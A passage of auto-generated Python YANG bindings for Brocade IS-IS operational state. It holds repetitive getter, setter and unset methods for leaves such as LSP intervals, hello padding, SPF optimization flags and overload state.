'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-fast-flood-count", rest_name="lsp-fast-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_fast_flood_count = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_fast_flood_count(self):
self.__lsp_fast_flood_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-fast-flood-count", rest_name="lsp-fast-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_fast_flood_wait_count(self):
"""
Getter method for fast_flood_wait_count, mapped from YANG variable /isis_state/router_isis_config/fast_flood_wait_count (uint16)
YANG Description: Number of 100msec iteration ISIS to wait without running SPF to succeed fast flood
"""
return self.__fast_flood_wait_count
def _set_fast_flood_wait_count(self, v, load=False):
"""
Setter method for fast_flood_wait_count, mapped from YANG variable /isis_state/router_isis_config/fast_flood_wait_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_fast_flood_wait_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_fast_flood_wait_count() directly.
YANG Description: Number of 100msec iteration ISIS to wait without running SPF to succeed fast flood
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="fast-flood-wait-count", rest_name="fast-flood-wait-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """fast_flood_wait_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="fast-flood-wait-count", rest_name="fast-flood-wait-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__fast_flood_wait_count = t
if hasattr(self, '_set'):
self._set()
def _unset_fast_flood_wait_count(self):
self.__fast_flood_wait_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="fast-flood-wait-count", rest_name="fast-flood-wait-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_hello_padding(self):
"""
Getter method for hello_padding, mapped from YANG variable /isis_state/router_isis_config/hello_padding (isis-status)
YANG Description: If padding of IS-IS hello PDUs to full MTU enabled
"""
return self.__hello_padding
def _set_hello_padding(self, v, load=False):
"""
Setter method for hello_padding, mapped from YANG variable /isis_state/router_isis_config/hello_padding (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_hello_padding is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hello_padding() directly.
YANG Description: If padding of IS-IS hello PDUs to full MTU enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding", rest_name="hello-padding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """hello_padding must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding", rest_name="hello-padding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__hello_padding = t
if hasattr(self, '_set'):
self._set()
def _unset_hello_padding(self):
self.__hello_padding = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding", rest_name="hello-padding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_hello_padding_ptp(self):
"""
Getter method for hello_padding_ptp, mapped from YANG variable /isis_state/router_isis_config/hello_padding_ptp (isis-status)
YANG Description: If padding of IS-IS hello PDUs enabled on P2P interfaces
"""
return self.__hello_padding_ptp
def _set_hello_padding_ptp(self, v, load=False):
"""
Setter method for hello_padding_ptp, mapped from YANG variable /isis_state/router_isis_config/hello_padding_ptp (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_hello_padding_ptp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hello_padding_ptp() directly.
YANG Description: If padding of IS-IS hello PDUs enabled on P2P interfaces
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding-ptp", rest_name="hello-padding-ptp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """hello_padding_ptp must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding-ptp", rest_name="hello-padding-ptp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__hello_padding_ptp = t
if hasattr(self, '_set'):
self._set()
def _unset_hello_padding_ptp(self):
self.__hello_padding_ptp = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding-ptp", rest_name="hello-padding-ptp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_csnp_interval(self):
"""
Getter method for csnp_interval, mapped from YANG variable /isis_state/router_isis_config/csnp_interval (uint16)
YANG Description: Rate of transmission of CSNPs
"""
return self.__csnp_interval
def _set_csnp_interval(self, v, load=False):
"""
Setter method for csnp_interval, mapped from YANG variable /isis_state/router_isis_config/csnp_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_csnp_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_csnp_interval() directly.
YANG Description: Rate of transmission of CSNPs
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="csnp-interval", rest_name="csnp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """csnp_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="csnp-interval", rest_name="csnp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__csnp_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_csnp_interval(self):
self.__csnp_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="csnp-interval", rest_name="csnp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_lsp_gen_interval(self):
"""
Getter method for lsp_gen_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_gen_interval (uint16)
YANG Description: Minimum interval between regenerating same LSP
"""
return self.__lsp_gen_interval
def _set_lsp_gen_interval(self, v, load=False):
"""
Setter method for lsp_gen_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_gen_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_gen_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_gen_interval() directly.
YANG Description: Minimum interval between regenerating same LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-gen-interval", rest_name="lsp-gen-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_gen_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-gen-interval", rest_name="lsp-gen-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_gen_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_gen_interval(self):
self.__lsp_gen_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-gen-interval", rest_name="lsp-gen-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_lsp_interval(self):
"""
Getter method for lsp_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_interval (uint32)
YANG Description: Rate of transmission of LSPs
"""
return self.__lsp_interval
def _set_lsp_interval(self, v, load=False):
"""
Setter method for lsp_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_interval (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_interval() directly.
YANG Description: Rate of transmission of LSPs
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-interval", rest_name="lsp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_interval must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-interval", rest_name="lsp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)""",
})
self.__lsp_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_interval(self):
self.__lsp_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-interval", rest_name="lsp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
def _get_lsp_refresh_interval(self):
"""
Getter method for lsp_refresh_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_refresh_interval (uint16)
YANG Description: LSP refresh interval
"""
return self.__lsp_refresh_interval
def _set_lsp_refresh_interval(self, v, load=False):
"""
Setter method for lsp_refresh_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_refresh_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_refresh_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_refresh_interval() directly.
YANG Description: LSP refresh interval
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-refresh-interval", rest_name="lsp-refresh-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_refresh_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-refresh-interval", rest_name="lsp-refresh-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_refresh_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_refresh_interval(self):
self.__lsp_refresh_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-refresh-interval", rest_name="lsp-refresh-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_lsp_lifetime(self):
"""
Getter method for lsp_lifetime, mapped from YANG variable /isis_state/router_isis_config/lsp_lifetime (uint16)
YANG Description: Maximum LSP lifetime
"""
return self.__lsp_lifetime
def _set_lsp_lifetime(self, v, load=False):
"""
Setter method for lsp_lifetime, mapped from YANG variable /isis_state/router_isis_config/lsp_lifetime (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_lifetime is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_lifetime() directly.
YANG Description: Maximum LSP lifetime
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-lifetime", rest_name="lsp-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_lifetime must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-lifetime", rest_name="lsp-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_lifetime = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_lifetime(self):
self.__lsp_lifetime = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-lifetime", rest_name="lsp-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_retransmit_interval(self):
"""
Getter method for retransmit_interval, mapped from YANG variable /isis_state/router_isis_config/retransmit_interval (uint16)
YANG Description: Time between retransmission of LSP
"""
return self.__retransmit_interval
def _set_retransmit_interval(self, v, load=False):
"""
Setter method for retransmit_interval, mapped from YANG variable /isis_state/router_isis_config/retransmit_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_retransmit_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_retransmit_interval() directly.
YANG Description: Time between retransmission of LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """retransmit_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__retransmit_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_retransmit_interval(self):
self.__retransmit_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_pspf_enabled(self):
"""
Getter method for pspf_enabled, mapped from YANG variable /isis_state/router_isis_config/pspf_enabled (isis-status)
YANG Description: If Partial SPF Optimizations enabled
"""
return self.__pspf_enabled
def _set_pspf_enabled(self, v, load=False):
"""
Setter method for pspf_enabled, mapped from YANG variable /isis_state/router_isis_config/pspf_enabled (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_pspf_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_pspf_enabled() directly.
YANG Description: If Partial SPF Optimizations enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="pspf-enabled", rest_name="pspf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """pspf_enabled must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="pspf-enabled", rest_name="pspf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__pspf_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_pspf_enabled(self):
self.__pspf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="pspf-enabled", rest_name="pspf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_ispf_enabled(self):
"""
Getter method for ispf_enabled, mapped from YANG variable /isis_state/router_isis_config/ispf_enabled (isis-status)
YANG Description: If Incremental SPF Optimizations enabled
"""
return self.__ispf_enabled
def _set_ispf_enabled(self, v, load=False):
"""
Setter method for ispf_enabled, mapped from YANG variable /isis_state/router_isis_config/ispf_enabled (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_ispf_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ispf_enabled() directly.
YANG Description: If Incremental SPF Optimizations enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="ispf-enabled", rest_name="ispf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ispf_enabled must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="ispf-enabled", rest_name="ispf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__ispf_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_ispf_enabled(self):
self.__ispf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="ispf-enabled", rest_name="ispf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_istct_spf_enabled(self):
"""
Getter method for istct_spf_enabled, mapped from YANG variable /isis_state/router_isis_config/istct_spf_enabled (isis-status)
YANG Description: If incremental shortcut LSP SPF optimization enabled
"""
return self.__istct_spf_enabled
def _set_istct_spf_enabled(self, v, load=False):
"""
Setter method for istct_spf_enabled, mapped from YANG variable /isis_state/router_isis_config/istct_spf_enabled (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_istct_spf_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_istct_spf_enabled() directly.
YANG Description: If incremental shortcut LSP SPF optimization enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="istct-spf-enabled", rest_name="istct-spf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """istct_spf_enabled must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="istct-spf-enabled", rest_name="istct-spf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__istct_spf_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_istct_spf_enabled(self):
self.__istct_spf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="istct-spf-enabled", rest_name="istct-spf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_overload_state(self):
"""
Getter method for overload_state, mapped from YANG variable /isis_state/router_isis_config/overload_state (isis-status)
YANG Description: If Overload-bit is set - indicates others that this IS could not be used
"""
return self.__overload_state
def _set_overload_state(self, v, load=False):
"""
Setter method for overload_state, mapped from YANG variable /isis_state/router_isis_config/overload_state (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_overload_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_overload_state() directly.
YANG Description: If Overload-bit is set - indicates others that this IS could not be used
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-state", rest_name="overload-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """overload_state must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-state", rest_name="overload-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__overload_state = t
if hasattr(self, '_set'):
self._set()
def _unset_overload_state(self):
self.__overload_state = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-state", rest_name="overload-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_overload_startup_time(self):
"""
Getter method for overload_startup_time, mapped from YANG variable /isis_state/router_isis_config/overload_startup_time (uint32)
YANG Description: Time in seconds to stay temporarity in overloaded state on reboot
"""
return self.__overload_startup_time
def _set_overload_startup_time(self, v, load=False):
"""
Setter method for overload_startup_time, mapped from YANG variable /isis_state/router_isis_config/overload_startup_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_overload_startup_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_overload_startup_time() directly.
YANG Description: Time in seconds to stay temporarity in overloaded state on reboot
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-startup-time", rest_name="overload-startup-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """overload_startup_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-startup-time", rest_name="overload-startup-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)""",
})
self.__overload_startup_time = t
if hasattr(self, '_set'):
self._set()
def _unset_overload_startup_time(self):
self.__overload_startup_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-startup-time", rest_name="overload-startup-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
def _get_overload_wait_on_bgp(self):
"""
